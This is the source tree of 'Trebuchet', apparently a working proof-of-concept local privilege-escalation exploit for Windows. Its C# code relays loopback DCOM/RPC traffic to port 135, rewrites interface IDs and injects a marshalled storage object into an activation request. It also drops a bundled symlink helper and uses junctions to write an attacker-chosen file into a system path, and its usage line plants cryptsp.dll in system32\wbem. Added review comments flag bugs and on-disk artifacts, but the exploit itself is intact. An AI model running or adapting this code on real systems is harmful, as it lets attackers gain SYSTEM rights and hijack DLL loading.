Guid("4991d34b-80a1-4291-83b6-3328366b9097"); 363 | 364 | TestClass c = new TestClass(stg, String.Format("127.0.0.1[{0}]", port)); 365 | 366 | MULTI_QI[] qis = new MULTI_QI[1]; 367 | 368 | qis[0].pIID = ComUtils.IID_IUnknownPtr; 369 | qis[0].pItf = null; 370 | qis[0].hr = 0; 371 | //Console.WriteLine("Converting the Data!"); 372 | try 373 | { 374 | CoGetInstanceFromIStorage(null, ref clsid, 375 | null, CLSCTX.CLSCTX_LOCAL_SERVER, c, 1, qis); 376 | } 377 | catch 378 | { 379 | //Console.WriteLine("Caught it!"); 380 | } 381 | //Console.WriteLine("Finished with BootStrap!"); 382 | } 383 | } 384 | } 385 | -------------------------------------------------------------------------------- /Trebuchet/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /Trebuchet/PackageBuilder.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Collections.Generic; 3 | using System.IO; 4 | using System.Linq; 5 | using System.Text; 6 | using System.Threading.Tasks; 7 | 8 | namespace Trebuchet 9 | { 10 | class PackageBuilder 11 | { 12 | static byte[] header = { 13 | 0x01, 0x05, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x08, 0x00, 0x00, 0x00, 14 | 0x50, 0x61, 0x63, 0x6B, 0x61, 0x67, 0x65, 0x00, 0x00, 0x00, 0x00, 0x00, 15 | 0x00, 0x00, 0x00, 0x00 16 | }; 17 | 18 | static byte[] trailingHeader = { 19 | 0x01, 0x05, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00 20 | }; 21 | 22 | static byte[] BuildPackageList(string path, byte[] data) 23 | { 24 | //string file = Path.GetFileName(path) + "/\0"; 25 | string file = "XXX\0"; 26 | path = path + "/\0"; 27 | 28 | MemoryStream stm = new MemoryStream(); 29 | BinaryWriter writer = new BinaryWriter(stm); 30 | 
byte[] pathbytes = Encoding.ASCII.GetBytes(path);

            // BinaryWriter emits the integer values below in little-endian order;
            // the int overloads (0x30001 and both lengths) take four bytes each.
            writer.Write((ushort)2);
            writer.Write(Encoding.ASCII.GetBytes(file));
            writer.Write(Encoding.ASCII.GetBytes("XXX\0"));
            writer.Write(0x30001);
            writer.Write(pathbytes.Length);
            writer.Write(pathbytes);
            writer.Write(data.Length);
            writer.Write(data);
            writer.Write((ushort)0);

            return stm.ToArray();
        }

        /// <summary>
        /// Wraps the record from BuildPackageList between the fixed header and the
        /// fixed trailer, with a 4-byte length written ahead of the record.
        /// </summary>
        /// <param name="path">Path passed through to BuildPackageList.</param>
        /// <param name="data">Payload passed through to BuildPackageList.</param>
        /// <returns>header + record length + record + trailingHeader.</returns>
        public static byte[] BuildPackage(string path, byte[] data)
        {
            MemoryStream stm = new MemoryStream();
            BinaryWriter writer = new BinaryWriter(stm);
            byte[] packageData = BuildPackageList(path, data);

            writer.Write(header);
            writer.Write(packageData.Length);
            writer.Write(packageData);
            writer.Write(trailingHeader);

            return stm.ToArray();
        }
    }
}

--------------------------------------------------------------------------------
/Trebuchet/Program.cs:
--------------------------------------------------------------------------------
using Microsoft.VisualStudio.OLE.Interop;
using System;
using System.Diagnostics;
using System.IO;
using System.Net;
using System.Net.Sockets;
using System.Text;
using System.Threading;

namespace Trebuchet
{
    class Program
    {
        // One RPC packet as relayed by this program: a 16-byte fixed header
        // (1+1+1+1+4+2+2+4 bytes, matching the reads in FromStream) followed by the
        // body and the authentication trailer.
        class RpcHeader
        {
            public byte MajorVersion;
            public byte MinorVersion;
            public byte PacketType;
            public byte PacketFlags;
            public uint DataRepresentation;
            public ushort FragLength;
            public ushort AuthLength;
            public uint CallId;
            public byte[] Data;
            public byte[] AuthData;

            /// <summary>
            /// Reads one packet from <paramref name="reader"/>: the fixed header
            /// fields, then the body and the authentication trailer.
            /// </summary>
            public static RpcHeader FromStream(BinaryReader reader)
            {
                RpcHeader header = new RpcHeader();
                header.MajorVersion = reader.ReadByte();
                header.MinorVersion = reader.ReadByte();
                header.PacketType = reader.ReadByte();
                header.PacketFlags = reader.ReadByte();
                header.DataRepresentation = reader.ReadUInt32();
                header.FragLength = 
reader.ReadUInt16();
                header.AuthLength = reader.ReadUInt16();
                header.CallId = reader.ReadUInt32();

                // Body length = total fragment length minus auth trailer minus the
                // 16 header bytes already consumed.
                // NOTE(review): both lengths come straight from the peer and are not
                // validated. If FragLength < AuthLength + 16 the count is negative and
                // ReadBytes throws; the relay loops in this file catch Exception and
                // stop the thread.
                header.Data = reader.ReadBytes(header.FragLength - header.AuthLength - 16);
                header.AuthData = reader.ReadBytes(header.AuthLength);

                return header;
            }

            /// <summary>
            /// Serialises this packet and writes it to <paramref name="writer"/> in one
            /// call. The two length fields are recomputed from Data and AuthData; the
            /// stored FragLength and AuthLength values are not written.
            /// </summary>
            public void ToStream(BinaryWriter writer)
            {
                MemoryStream stm = new MemoryStream();
                BinaryWriter w = new BinaryWriter(stm);

                w.Write(MajorVersion);
                w.Write(MinorVersion);
                w.Write(PacketType);
                w.Write(PacketFlags);
                w.Write(DataRepresentation);
                // NOTE(review): the (ushort) casts wrap silently in an unchecked
                // context if the combined length exceeds 65535.
                w.Write((ushort)(Data.Length + AuthData.Length + 16));
                w.Write((ushort)AuthData.Length);
                w.Write(CallId);
                w.Write(Data);
                w.Write(AuthData);

                writer.Write(stm.ToArray());
            }
        }

        // Holds both ends of one relayed connection (the accepted client and the
        // outbound server connection) plus a reader and writer over each stream.
        class RpcContextSplit
        {
            public TcpClient client;
            public BinaryReader clientReader;
            public BinaryWriter clientWriter;
            public TcpClient server;
            public BinaryReader serverReader;
            public BinaryWriter serverWriter;
            // Marshalled object bytes; assigned by DoRpcTest, read by ReaderThread.
            public byte[] objref;

            public RpcContextSplit(TcpClient client, TcpClient server)
            {
                this.client = client;
                this.server = server;
                clientReader = new BinaryReader(client.GetStream());
                clientWriter = new BinaryWriter(client.GetStream());
                serverReader = new BinaryReader(server.GetStream());
                serverWriter = new BinaryWriter(server.GetStream());
            }
        }

        // 16 raw bytes; read as a GUID in the usual mixed-endian layout they spell
        // 99fcfec4-5260-101b-bbcb-00aa0021347a. ReaderThread searches packet bodies
        // for this sequence.
        static byte[] oxidResolveIID = {
            0xC4, 0xFE, 0xFC, 0x99, 0x60, 0x52, 0x1B, 0x10, 0xBB, 0xCB, 0x00, 0xAA,
            0x00, 0x21, 0x34, 0x7A
        };

        // 16 raw bytes; in the same layout they spell
        // 000001a0-0000-0000-c000-000000000046. ReaderThread writes this sequence in
        // place of oxidResolveIID.
        static byte[] systemActivatorIID = {
            0xA0, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xC0, 0x00, 0x00, 0x00,
            0x00, 0x00, 0x00, 0x46
        };

        /// <summary>
        /// Returns the index of the first occurrence of <paramref name="find"/> in
        /// <paramref name="src"/> at or after <paramref name="startIndex"/>, or -1.
        /// </summary>
        // NOTE(review): on a mismatch the match position is reset without re-testing
        // the current byte against find[0], so a pattern whose first byte repeats just
        // before the real match can be missed. An empty `find` would index out of range.
        static int FindBytes(byte[] src, int startIndex, byte[] find)
        {
            int index = -1;
            int matchIndex = 0;
            // handle the complete source array
            for (int i = startIndex; i < src.Length; i++)
{
                if (src[i] == find[matchIndex])
                {
                    if (matchIndex == (find.Length - 1))
                    {
                        // Last pattern byte matched: report where the match began.
                        index = i - matchIndex;
                        break;
                    }
                    matchIndex++;
                }
                else
                {
                    matchIndex = 0;
                }

            }
            return index;
        }

        /// <summary>
        /// Returns a copy of <paramref name="src"/> with every occurrence of
        /// <paramref name="search"/> replaced by <paramref name="repl"/>, or null when
        /// <paramref name="search"/> does not occur. Callers use the null return to
        /// tell "nothing replaced" from "replaced".
        /// </summary>
        static byte[] ReplaceBytes(byte[] src, byte[] search, byte[] repl)
        {
            byte[] dst = null;
            int index = FindBytes(src, 0, search);
            while(index >= 0)
            {
                //Console.WriteLine("Found Match at {0}", index);
                dst = new byte[src.Length - search.Length + repl.Length];
                // before found array
                Buffer.BlockCopy(src, 0, dst, 0, index);
                // repl copy
                Buffer.BlockCopy(repl, 0, dst, index, repl.Length);
                // rest of src array
                Buffer.BlockCopy(
                    src,
                    index + search.Length,
                    dst,
                    index + repl.Length,
                    src.Length - (index + search.Length));
                // Continue searching in the rewritten buffer, one byte past the
                // start of the replacement just made.
                src = dst;
                index = FindBytes(src, index + 1, search);
            }
            return dst;
        }

        /// <summary>
        /// Read from the client socket and send to server
        /// </summary>
        /// <param name="o">The RpcContextSplit for this connection, passed as object.</param>
        static void ReaderThread(object o)
        {
            RpcContextSplit ctx = (RpcContextSplit)o;
            // Latched on the first packet that carries an authentication trailer.
            bool isauth = false;
            // Latched once the byte substitution below has matched.
            bool replacediid = false;

            try
            {
                while (true)
                {
                    RpcHeader header = RpcHeader.FromStream(ctx.clientReader);

                    if (!isauth && header.AuthLength > 0)
                    {
                        isauth = true;
                    }

                    // Packets seen before any auth trailer are relayed unmodified.
                    if (isauth)
                    {
                        if (!replacediid)
                        {
                            // ReplaceBytes returns null when the pattern is absent, so
                            // the flag stays false until a packet body contains it.
                            byte[] b = ReplaceBytes(header.Data, oxidResolveIID, systemActivatorIID);
                            if (b != null)
                            {
                                header.Data = b;
                                replacediid = true;
                            }
                        }
                        else
                        {
                            // Is a RPC request
                            if (header.PacketType == 0)
                            {
                                //Console.WriteLine("Changing activation at localsystem");

                                // The client's packet is discarded here and a packet
                                // parsed from the embedded "request" resource is sent
                                // in its place, patched with ctx.objref below.
                                byte[] actData = Trebuchet.Properties.Resources.request;

                                for (int i = 0; i < ctx.objref.Length; ++i)
                                {
                                    // Replace the 
// marshalled IStorage object
                                    // NOTE(review): offset 0x368 is fixed and is not
                                    // checked against actData.Length or objref.Length.
                                    actData[i + 0x368] = ctx.objref[i];
                                }

                                RpcHeader newHeader = RpcHeader.FromStream(new BinaryReader(new MemoryStream(actData)));

                                // Fixup callid
                                newHeader.CallId = header.CallId;

                                header = newHeader;
                            }
                        }
                    }

                    //Console.WriteLine("=> Packet: {0} Data: {1} Auth: {2} {3}", header.PacketType, header.FragLength, header.AuthLength, isauth);

                    header.ToStream(ctx.serverWriter);
                }
            }
            catch (Exception ex)
            {
                // Any read, parse or write failure ends the relay loop; the exception
                // is only printed.
                Console.WriteLine(ex);
            }

            Console.WriteLine("Stopping Reader Thread");

            ctx.client.Client.Shutdown(SocketShutdown.Receive);
            ctx.server.Client.Shutdown(SocketShutdown.Send);
        }

        /// <summary>
        /// Reads packets from the server connection and writes each one to the client
        /// connection unchanged, until a read or write throws.
        /// </summary>
        /// <param name="o">The RpcContextSplit for this connection, passed as object.</param>
        static void WriterThread(object o)
        {
            RpcContextSplit ctx = (RpcContextSplit)o;
            try
            {
                while (true)
                {
                    RpcHeader header = RpcHeader.FromStream(ctx.serverReader);

                    //Console.WriteLine("<= Packet: {0} Data: {1} Auth: {2}", header.PacketType, header.FragLength, header.AuthLength);
                    header.ToStream(ctx.clientWriter);
                }
            }
            catch(Exception ex)
            {
                Console.WriteLine(ex);
            }

            Console.WriteLine("Stopping Writer Thread");
            ctx.client.Client.Shutdown(SocketShutdown.Send);
            ctx.server.Client.Shutdown(SocketShutdown.Receive);
        }


        // Loopback port used by the listener in DoRpcTest and passed to
        // ComUtils.BootstrapComMarshal by Main.
        const int DUMMY_LOCAL_PORT = 6666;

        /// <summary>
        /// Returns 8 characters, each 'A' plus a value from r.Next(26), i.e. uppercase
        /// A-Z.
        /// </summary>
        static string GenRandomName()
        {
            Random r = new Random();
            StringBuilder builder = new StringBuilder();

            for (int i = 0; i < 8; i++)
            {
                int c = r.Next(26);
                builder.Append((char)('A' + c));
            }

            return builder.ToString();
        }

        /// <summary>
        /// Runs "mklink /J" through cmd.exe to create a directory junction at
        /// <paramref name="path"/> pointing to <paramref name="target"/>; the visible
        /// part of the body builds the command line and the process start info.
        /// </summary>
        // NOTE(review): path and target are placed into the command line without
        // quoting or escaping here, so spaces or cmd metacharacters in either value
        // change how the command is parsed.
        static bool CreateJunction(string path, string target)
        {
            string cmdline = String.Format("cmd /c mklink /J {0} {1}", path, target);

            ProcessStartInfo si = new ProcessStartInfo("cmd.exe", cmdline);
si.UseShellExecute = false;

            Process p = Process.Start(si);
            p.WaitForExit();

            // Success is judged solely by cmd.exe's exit code.
            return p.ExitCode == 0;
        }

        /// <summary>
        /// Starts the helper at C:\users\public\libraries\createsymlink.exe through
        /// cmd.exe with <paramref name="path"/> and <paramref name="target"/> as quoted
        /// arguments, waits two seconds, and reports whether the started process has
        /// already exited.
        /// </summary>
        /// <returns>
        /// true when the process has exited within the wait. The caller in DoRpcTest
        /// treats true as failure.
        /// </returns>
        // NOTE(review): the arguments are wrapped in quotes but not escaped, so a value
        // that itself contains a quote breaks the command line.
        static bool CreateSymlink(string path, string target)
        {
            string cmdline = String.Format("cmd /c C:\\users\\public\\libraries\\createsymlink.exe \"{0}\" \"{1}\"", path, target);

            ProcessStartInfo si = new ProcessStartInfo("cmd.exe", cmdline);
            si.UseShellExecute = false;

            Process symLinkProc = Process.Start(si);
            Thread.Sleep(2000);

            return symLinkProc.HasExited;
        }

        /// <summary>
        /// Worker started by Main on a background thread: reads the input file,
        /// writes the bundled helper executable to disk, creates a junction and a
        /// symlink, builds the marshalled storage, then accepts loopback connections
        /// and relays each one to 127.0.0.1:135.
        /// </summary>
        /// <param name="o">A ManualResetEvent, set once the listener has started.</param>
        /// <param name="ctx">Receives the context of the most recently accepted connection.</param>
        /// <param name="rock">Path of the file whose bytes are embedded in the package.</param>
        /// <param name="castle">Target passed to CreateSymlink.</param>
        // NOTE(review): MTAThreadAttribute is documented for the application entry
        // point; it presumably has no effect on this method - confirm.
        [MTAThread]
        static void DoRpcTest(object o, ref RpcContextSplit ctx, string rock, string castle)
        {
            ManualResetEvent ev = (ManualResetEvent)o;
            TcpListener listener = new TcpListener(IPAddress.Loopback, DUMMY_LOCAL_PORT);
            byte[] rockBytes = null;

            try { rockBytes = File.ReadAllBytes(rock); }
            catch
            {
                Console.WriteLine("[!] Error reading initial file!");
                // Terminates the whole process, not only this thread.
                Environment.Exit(1);
            }

            Console.WriteLine(String.Format("[+] Loaded in {0} bytes.", rockBytes.Length));

            // True when the PROCESSOR_ARCHITEW6432 environment variable is set and
            // non-empty; selects which bundled helper is written below.
            bool is64bit = !string.IsNullOrEmpty(Environment.GetEnvironmentVariable("PROCESSOR_ARCHITEW6432"));
            try
            {
                Console.WriteLine("[+] Getting out our toolbox...");
                // Observable artifact: an executable is written to
                // C:\users\public\libraries\createsymlink.exe in either branch.
                if (is64bit)
                {
                    File.WriteAllBytes("C:\\users\\public\\libraries\\createsymlink.exe", Trebuchet.Properties.Resources.CreateSymlinkx64);
                }
                else
                {
                    File.WriteAllBytes("C:\\users\\public\\libraries\\createsymlink.exe", Trebuchet.Properties.Resources.CreateSymlinkx86);
                }
            }
            catch
            {
                Console.WriteLine("[!] 
Error writing to C:\\users\\public\\libraries\\createsymlink.exe!");
                Environment.Exit(1);
            }

            string name = GenRandomName();
            string windir = Environment.GetFolderPath(Environment.SpecialFolder.Windows);

            // Observable artifact: a directory junction named with 8 uppercase letters
            // is created under <Windows>\temp, pointing into
            // C:\users\public\libraries\Sym\.
            string tempPath = Path.Combine(windir, "temp", name);
            if (!CreateJunction(tempPath, "\"C:\\users\\public\\libraries\\Sym\\"))
            {
                Console.WriteLine("[!] Couldn't create the junction");
                Environment.Exit(1);
            }

            // CreateSymlink returns true when the helper process has already exited
            // after its two-second wait; that is treated as failure here.
            if (CreateSymlink("C:\\users\\public\\libraries\\Sym\\ (2)", castle)) //Exit bool is inverted!
            {
                Console.WriteLine("[!] Couldn't create the SymLink!");
                Environment.Exit(1);
            }

            IStorage stg = ComUtils.CreatePackageStorage(name, rockBytes);
            byte[] objref = ComUtils.GetMarshalledObject(stg);

            // Observable artifact: a TCP listener on 127.0.0.1:DUMMY_LOCAL_PORT.
            listener.Start();

            // Signals Main that the listener is accepting.
            ev.Set();

            // Never returns: each accepted connection is paired with a new outbound
            // connection to 127.0.0.1:135 and served by two background threads.
            while (true)
            {
                try
                {
                    TcpClient client = listener.AcceptTcpClient();
                    TcpClient server = new TcpClient("127.0.0.1", 135);

                    //Console.WriteLine("Connected");

                    client.NoDelay = true;
                    server.NoDelay = true;

                    // ctx is a ref parameter: every accepted connection overwrites the
                    // caller's variable, so Main only sees the latest one.
                    ctx = new RpcContextSplit(client, server);
                    ctx.objref = objref;

                    Thread t = new Thread(ReaderThread);
                    t.IsBackground = true;
                    t.Start(ctx);

                    t = new Thread(WriterThread);
                    t.IsBackground = true;
                    t.Start(ctx);
                }
                catch (Exception ex)
                {
                    Console.WriteLine(ex);
                }
            }
        }

        /// <summary>
        /// Entry point. Expects two arguments (startFile, destination), starts
        /// DoRpcTest on a background thread, waits for its listener, calls
        /// ComUtils.BootstrapComMarshal, then waits for the helper process and cleans
        /// up.
        /// </summary>
        static void Main(string[] args)
        {
            try
            {
                ManualResetEvent e = new ManualResetEvent(false);

                RpcContextSplit ctx = null;

                if (args.Length < 2)
                {
                    Console.WriteLine("[+] Usage: Trebuchet [startFile] [destination]");
                    Console.WriteLine(" Example: Trebuchet C:\\users\\public\\libraries\\cryptsp.dll C:\\windows\\system32\\wbem\\cryptsp.dll");
                    System.Environment.Exit(1);
                }

                string rock = 
args[0];
                string castle = args[1];

                // ctx is captured by the lambda and passed by reference, so the worker
                // thread assigns the local declared above.
                Thread t = new Thread(() => DoRpcTest(e, ref ctx, rock, castle));

                t.IsBackground = true;
                t.Start();
                // Blocks until DoRpcTest has started its listener.
                e.WaitOne();
                try
                {
                    ComUtils.BootstrapComMarshal(DUMMY_LOCAL_PORT);
                }
                catch
                {
                    Console.WriteLine("[+] We Broke RPC! (Probably a good thing)");
                }

                // Takes the first running process named "CreateSymlink", if any.
                Process symLinkProc = null;
                foreach (var process in Process.GetProcessesByName("CreateSymlink"))
                {
                    symLinkProc = process;
                    break;
                }
                Console.WriteLine("[+] Waiting for CreateSymlink to close...");
                // NOTE(review): symLinkProc is still null when no such process was found;
                // the resulting exception is caught by the outer handler, which skips
                // the cleanup below and leaves the helper executable on disk.
                symLinkProc.WaitForExit();
                Console.WriteLine("[+] Cleaning Up!");
                // Only the helper executable is deleted; no code visible in this method
                // removes the junction created by DoRpcTest.
                try {
                    File.Delete("C:\\users\\public\\libraries\\CreateSymlink.exe");
                }catch{
                    Console.WriteLine("[!] Failed to delete C:\\users\\public\\libraries\\CreateSymlink.exe");
                }
                // NOTE(review): ctx is null if DoRpcTest never accepted a connection.
                ctx.client.Client.Shutdown(SocketShutdown.Send);
                ctx.server.Client.Shutdown(SocketShutdown.Receive);
            }
            catch (Exception ex)
            {
                Console.WriteLine(ex);
            }


        }
    }
}

-------------------------------------------------------------------------------- /Trebuchet/Properties/AssemblyInfo.cs: -------------------------------------------------------------------------------- 1 | using System.Reflection; 2 | using System.Runtime.CompilerServices; 3 | using System.Runtime.InteropServices; 4 | 5 | // General Information about an assembly is controlled through the following 6 | // set of attributes. Change these attribute values to modify the information 7 | // associated with an assembly. 
8 | [assembly: AssemblyTitle("Trebuchet")] 9 | [assembly: AssemblyDescription("")] 10 | [assembly: AssemblyConfiguration("")] 11 | [assembly: AssemblyCompany("")] 12 | [assembly: AssemblyProduct("Trebuchet")] 13 | [assembly: AssemblyCopyright("Copyright © 2015")] 14 | [assembly: AssemblyTrademark("")] 15 | [assembly: AssemblyCulture("")] 16 | 17 | // Setting ComVisible to false makes the types in this assembly not visible 18 | // to COM components. If you need to access a type in this assembly from 19 | // COM, set the ComVisible attribute to true on that type. 20 | [assembly: ComVisible(false)] 21 | 22 | // The following GUID is for the ID of the typelib if this project is exposed to COM 23 | [assembly: Guid("d6770b2d-bbd1-49ef-9daa-661b972ea606")] 24 | 25 | // Version information for an assembly consists of the following four values: 26 | // 27 | // Major Version 28 | // Minor Version 29 | // Build Number 30 | // Revision 31 | // 32 | // You can specify all the values or you can default the Build and Revision Numbers 33 | // by using the '*' as shown below: 34 | // [assembly: AssemblyVersion("1.0.*")] 35 | [assembly: AssemblyVersion("1.0.0.0")] 36 | [assembly: AssemblyFileVersion("1.0.0.0")] 37 | -------------------------------------------------------------------------------- /Trebuchet/Properties/Resources.Designer.cs: -------------------------------------------------------------------------------- 1 | //------------------------------------------------------------------------------ 2 | // 3 | // This code was generated by a tool. 4 | // Runtime Version:4.0.30319.0 5 | // 6 | // Changes to this file may cause incorrect behavior and will be lost if 7 | // the code is regenerated. 8 | // 9 | //------------------------------------------------------------------------------ 10 | 11 | namespace Trebuchet.Properties { 12 | using System; 13 | 14 | 15 | /// 16 | /// A strongly-typed resource class, for looking up localized strings, etc. 
17 | /// 18 | // This class was auto-generated by the StronglyTypedResourceBuilder 19 | // class via a tool like ResGen or Visual Studio. 20 | // To add or remove a member, edit your .ResX file then rerun ResGen 21 | // with the /str option, or rebuild your VS project. 22 | [global::System.CodeDom.Compiler.GeneratedCodeAttribute("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")] 23 | [global::System.Diagnostics.DebuggerNonUserCodeAttribute()] 24 | [global::System.Runtime.CompilerServices.CompilerGeneratedAttribute()] 25 | public class Resources { 26 | 27 | private static global::System.Resources.ResourceManager resourceMan; 28 | 29 | private static global::System.Globalization.CultureInfo resourceCulture; 30 | 31 | [global::System.Diagnostics.CodeAnalysis.SuppressMessageAttribute("Microsoft.Performance", "CA1811:AvoidUncalledPrivateCode")] 32 | internal Resources() { 33 | } 34 | 35 | /// 36 | /// Returns the cached ResourceManager instance used by this class. 37 | /// 38 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 39 | public static global::System.Resources.ResourceManager ResourceManager { 40 | get { 41 | if (object.ReferenceEquals(resourceMan, null)) { 42 | global::System.Resources.ResourceManager temp = new global::System.Resources.ResourceManager("Trebuchet.Properties.Resources", typeof(Resources).Assembly); 43 | resourceMan = temp; 44 | } 45 | return resourceMan; 46 | } 47 | } 48 | 49 | /// 50 | /// Overrides the current thread's CurrentUICulture property for all 51 | /// resource lookups using this strongly typed resource class. 
52 | /// 53 | [global::System.ComponentModel.EditorBrowsableAttribute(global::System.ComponentModel.EditorBrowsableState.Advanced)] 54 | public static global::System.Globalization.CultureInfo Culture { 55 | get { 56 | return resourceCulture; 57 | } 58 | set { 59 | resourceCulture = value; 60 | } 61 | } 62 | 63 | /// 64 | /// Looks up a localized resource of type System.Byte[]. 65 | /// 66 | public static byte[] CreateSymlinkx64 { 67 | get { 68 | object obj = ResourceManager.GetObject("CreateSymlinkx64", resourceCulture); 69 | return ((byte[])(obj)); 70 | } 71 | } 72 | 73 | /// 74 | /// Looks up a localized resource of type System.Byte[]. 75 | /// 76 | public static byte[] CreateSymlinkx86 { 77 | get { 78 | object obj = ResourceManager.GetObject("CreateSymlinkx86", resourceCulture); 79 | return ((byte[])(obj)); 80 | } 81 | } 82 | 83 | /// 84 | /// Looks up a localized resource of type System.Byte[]. 85 | /// 86 | public static byte[] Microsoft_VisualStudio_OLE_Interop { 87 | get { 88 | object obj = ResourceManager.GetObject("Microsoft_VisualStudio_OLE_Interop", resourceCulture); 89 | return ((byte[])(obj)); 90 | } 91 | } 92 | 93 | /// 94 | /// Looks up a localized resource of type System.Byte[]. 
95 | /// 96 | public static byte[] request { 97 | get { 98 | object obj = ResourceManager.GetObject("request", resourceCulture); 99 | return ((byte[])(obj)); 100 | } 101 | } 102 | } 103 | } 104 | -------------------------------------------------------------------------------- /Trebuchet/Properties/Resources.resx: -------------------------------------------------------------------------------- 1 |  2 | 3 | 62 | 63 | 64 | 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 77 | 78 | 79 | 80 | 81 | 82 | 83 | 84 | 85 | 86 | 87 | 88 | 89 | 90 | 91 | 92 | 93 | 94 | 95 | 96 | 97 | 98 | 99 | 100 | 101 | 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | text/microsoft-resx 110 | 111 | 112 | 2.0 113 | 114 | 115 | System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 116 | 117 | 118 | System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 119 | 120 | 121 | 122 | ..\resources\createsymlinkx64.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 123 | 124 | 125 | ..\resources\createsymlinkx86.exe;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 126 | 127 | 128 | ..\Microsoft.VisualStudio.OLE.Interop.dll;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 129 | 130 | 131 | ..\request.bin;System.Byte[], mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089 132 | 133 | -------------------------------------------------------------------------------- /Trebuchet/Resources/CreateSymlinkx64.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/Resources/CreateSymlinkx64.exe -------------------------------------------------------------------------------- 
/Trebuchet/Resources/CreateSymlinkx86.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/Resources/CreateSymlinkx86.exe -------------------------------------------------------------------------------- /Trebuchet/Trebuchet.csproj: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | Debug 6 | AnyCPU 7 | {02385F73-4546-4193-A112-EF17E4EADA62} 8 | Exe 9 | Properties 10 | Trebuchet 11 | Trebuchet 12 | v4.0 13 | 512 14 | 15 | 16 | AnyCPU 17 | true 18 | full 19 | false 20 | bin\Debug\ 21 | DEBUG;TRACE 22 | prompt 23 | 4 24 | 25 | 26 | AnyCPU 27 | pdbonly 28 | true 29 | bin\Release\ 30 | TRACE 31 | prompt 32 | 4 33 | 34 | 35 | 36 | False 37 | .\Microsoft.VisualStudio.OLE.Interop.dll 38 | 39 | 40 | 41 | 42 | 43 | 44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | 52 | 53 | 54 | 55 | 56 | True 57 | True 58 | Resources.resx 59 | 60 | 61 | 62 | 63 | PublicResXFileCodeGenerator 64 | Resources.Designer.cs 65 | 66 | 67 | 68 | 69 | 70 | 71 | 72 | 73 | 74 | 75 | 76 | 83 | -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Microsoft.VisualStudio.OLE.Interop.dll: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Microsoft.VisualStudio.OLE.Interop.dll -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Trebuchet.exe -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.pdb: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Trebuchet.pdb -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.vshost.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/bin/Release/Trebuchet.vshost.exe -------------------------------------------------------------------------------- /Trebuchet/bin/Release/Trebuchet.vshost.exe.manifest: -------------------------------------------------------------------------------- 1 |  2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferences.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferences.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/silentbreaksec/Trebuchet/7a5406398553d0df6c0cd2be543664b05164075a/Trebuchet/obj/Debug/DesignTimeResolveAssemblyReferencesInput.cache -------------------------------------------------------------------------------- /Trebuchet/obj/Debug/Poc_DCERPCNTLMReflection_EoP.Properties.Resources.resources: -------------------------------------------------------------------------------- 
